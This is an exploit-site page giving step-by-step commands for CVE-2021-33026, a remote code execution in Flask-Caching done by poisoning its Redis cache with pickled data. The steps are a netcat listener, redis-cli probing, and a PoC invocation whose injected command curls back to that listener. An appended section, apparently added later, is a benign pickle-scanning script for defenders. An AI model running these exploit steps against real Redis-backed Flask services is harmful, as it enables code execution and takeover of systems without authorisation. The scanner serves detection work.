## https://sploitus.com/exploit?id=FB7F4DA4-34A7-58CD-945D-6210A6F69011
Pickle Serialization Remote Code Execution - Redis Poisoning PoC Exploit
--------------------------------------------------
Check that the Redis server is up and running, then list the keys and read one value:
redis-cli -h 127.0.0.1 -p 6379 ping
redis-cli keys "*"
redis-cli get [Keyid]
-------------------------
Start a netcat listener on port 10001:
nc -nvlp 10001
-------------------------
Setting up the environment for Flask Cache:
python -m venv venv_flask_cache_<lib_ver>
source venv_flask_cache_<lib_ver>/Scripts/activate
pip install -r <requirement.txt>
Setting up the environment for Flask Cache 2.3.0
Run the Flask app and create a cache key:
flask run
curl --header "Content-Type: application/json" --request POST --data {\"key\":\"Cachelib_2.3\"} http://localhost:5000/cache/new
Get the cache key value from the Flask app:
curl --request GET http://localhost:5000/cache/[key]
Exploiting Flask Cache by poisoning the Redis cache:
cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a
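-------------------------
Defender-side check for the cache poisoning step above, as an added example that is not part of the original PoC: it walks the pickle opcodes of each cached value with pickletools, never unpickling, and reports any imported global outside an allow-list. The b"!" value prefix, the allow-list and the sample key names are assumptions; the sample values are constructed and benign.

```python
import datetime
import pickle
import pickletools

PICKLE_PREFIX = b"!"  # assumption: backend stores b"!" + pickle bytes, ints as ASCII
ALLOWED_GLOBALS = {"collections.OrderedDict"}  # hypothetical per-application allow-list
NO_STACK_EFFECT = {"PROTO", "FRAME", "MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"}


def referenced_globals(raw):
    """Return the 'module.name' imports a pickle stream asks for, without loading it."""
    found, recent = [], []
    for op, arg, _pos in pickletools.genops(raw):
        if op.name in NO_STACK_EFFECT:
            continue
        if op.name in ("GLOBAL", "INST"):  # protocols 0-3: "module name" in one argument
            found.append(arg.replace(" ", ".", 1))
        elif op.name == "STACK_GLOBAL":  # protocol 4+: module and name pushed as strings
            pair = recent[-2:]
            ok = len(pair) == 2 and all(isinstance(a, str) for a in pair)
            found.append(".".join(pair) if ok else "<unresolved>")
        recent.append(arg)
    return found


def audit_cache(entries, allowed=ALLOWED_GLOBALS):
    """Map each cache key to the non-allow-listed globals its value references."""
    report = {}
    for key, raw in entries.items():
        if not raw.startswith(PICKLE_PREFIX):
            continue  # not a pickled value
        try:
            bad = [g for g in referenced_globals(raw[1:]) if g not in allowed]
        except Exception as exc:  # truncated or malformed stream is itself a finding
            bad = [f"<unparseable: {type(exc).__name__}>"]
        if bad:
            report[key] = bad
    return report


# Constructed sample values standing in for `redis-cli get` output; all are benign.
SAMPLE = {
    "sample:dict": PICKLE_PREFIX + pickle.dumps({"key": "Cachelib_2.3"}, protocol=4),
    "sample:int": b"42",
    "sample:date": PICKLE_PREFIX + pickle.dumps(datetime.date(2021, 6, 1), protocol=4),
    "sample:broken": PICKLE_PREFIX + b"\x80\x04\xff",
}

if __name__ == "__main__":
    print(audit_cache(SAMPLE))
```

A cached value that references a global the application never stores is a sign that something other than the application wrote to Redis. The allow-list is a detection aid only and does not make unpickling untrusted cache contents safe.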